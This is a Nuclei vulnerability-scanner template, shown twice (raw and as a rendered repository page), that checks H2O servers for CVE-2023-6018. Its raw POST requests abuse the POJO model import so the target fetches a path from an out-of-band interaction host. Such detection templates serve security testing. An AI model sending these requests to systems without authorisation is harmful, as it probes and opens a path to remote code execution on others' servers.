ai-exploits/h2o/nuclei-templates/h2o-pojo-rce.yaml

id: h2o-pojo-import-rce

info:
  name: H2O RCE via POJO Model import
  author: Sierra Bearchell (Vuln Discovery), byt3bl33d3r (Nuclei Template)
  severity: critical
  description: RCE in H2O dashboard by (ab)using it's POJO Model import feature
  reference:
    - https://huntr.com/bounties/83dd17ec-053e-453c-befb-7d6736bf1836/
  classification:
    cvss-score: 10
    cve-id: CVE-2023-6018
    cwe-id: CWE-78
  tags: h2o-3,h2o,cve,ml,protectai,huntr

http:
  - raw:
      - |
        POST /3/ModelBuilders/generic/parameters HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        model_id=generic-68510df2-f19a-4871-8285-9321a7ef6d51

      - |
        POST /3/ModelBuilders/generic/parameters HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        model_id=generic-68510df2-f19a-4871-8285-9321a7ef6d51&path=http%3A%2F%2F93{{interactsh-url}}

      - |
        POST /3/ModelBuilders/generic/parameters HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        model_id=generic-68510df2-f19a-4871-8285-9321a7ef6d51&path=http%3A%2F%2F93{{interactsh-url}}
  
      - |
        POST /3/ModelBuilders/generic HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        model_id=generic-68510df2-f19a-4871-8285-9321a7ef6d51&path=http%3A%2F%2F93{{interactsh-url}}

    matchers:
      - type: word
        part: interactsh_protocol # Confirms http Interaction
        words:
          - "http"
Initial commit for release 🗡️ 2023-11-16 16:25:48 +00:00			`id: h2o-pojo-import-rce`

			`info:`
			`name: H2O RCE via POJO Model import`
			`author: Sierra Bearchell (Vuln Discovery), byt3bl33d3r (Nuclei Template)`
			`severity: critical`
			`description: RCE in H2O dashboard by (ab)using it's POJO Model import feature`
			`reference:`
			`- https://huntr.com/bounties/83dd17ec-053e-453c-befb-7d6736bf1836/`
			`classification:`
			`cvss-score: 10`
			`cve-id: CVE-2023-6018`
			`cwe-id: CWE-78`
			`tags: h2o-3,h2o,cve,ml,protectai,huntr`

			`http:`
			`- raw:`
			`- \|`
			`POST /3/ModelBuilders/generic/parameters HTTP/1.1`
			`Host: {{Hostname}}`
			`Content-Type: application/x-www-form-urlencoded`

			`model_id=generic-68510df2-f19a-4871-8285-9321a7ef6d51`

			`- \|`
			`POST /3/ModelBuilders/generic/parameters HTTP/1.1`
			`Host: {{Hostname}}`
			`Content-Type: application/x-www-form-urlencoded`

			`model_id=generic-68510df2-f19a-4871-8285-9321a7ef6d51&path=http%3A%2F%2F93{{interactsh-url}}`

			`- \|`
			`POST /3/ModelBuilders/generic/parameters HTTP/1.1`
			`Host: {{Hostname}}`
			`Content-Type: application/x-www-form-urlencoded`

			`model_id=generic-68510df2-f19a-4871-8285-9321a7ef6d51&path=http%3A%2F%2F93{{interactsh-url}}`

			`- \|`
			`POST /3/ModelBuilders/generic HTTP/1.1`
			`Host: {{Hostname}}`
			`Content-Type: application/x-www-form-urlencoded`

			`model_id=generic-68510df2-f19a-4871-8285-9321a7ef6d51&path=http%3A%2F%2F93{{interactsh-url}}`

			`matchers:`
			`- type: word`
			`part: interactsh_protocol # Confirms http Interaction`
			`words:`
			`- "http"`